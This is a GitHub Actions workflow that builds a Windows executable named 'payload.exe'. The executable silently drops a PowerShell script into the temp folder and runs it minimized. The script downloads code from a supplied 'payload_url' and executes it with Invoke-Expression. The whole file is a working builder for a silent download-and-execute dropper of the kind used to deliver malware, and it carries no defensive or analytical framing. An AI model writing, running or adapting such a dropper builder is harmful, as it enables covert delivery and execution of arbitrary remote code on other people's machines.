name: Build PowerShell EXE using NSIS (CMD Only)

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install NSIS
      shell: cmd
      run: choco install nsis -y

    - name: Generate PowerShell Script
      shell: cmd
      run: |
        echo $url = "${{ github.event.inputs.payload_url }}" > script.ps1
        echo $response = (New-Object System.Net.WebClient).DownloadString($url) >> script.ps1
        echo Invoke-Expression $response >> script.ps1

    - name: Generate NSIS Script
      shell: cmd
      run: |
        echo !define OUTPUT "payload.exe" > script.nsi
        echo Outfile "${OUTPUT}" >> script.nsi
        echo SilentInstall silent >> script.nsi
        echo RequestExecutionLevel user >> script.nsi
        echo Section >> script.nsi
        echo   SetOutPath $TEMP >> script.nsi
        echo   File "script.ps1" >> script.nsi
        echo   nsExec::Exec "cmd.exe /c start /min cmd /c %TEMP%\script.ps1" >> script.nsi
        echo SectionEnd >> script.nsi

    - name: Build EXE using NSIS
      shell: cmd
      run: makensis script.nsi

    - name: Upload EXE Artifact
      uses: actions/upload-artifact@v4
      with:
        name: payload_exe
        path: payload.exe

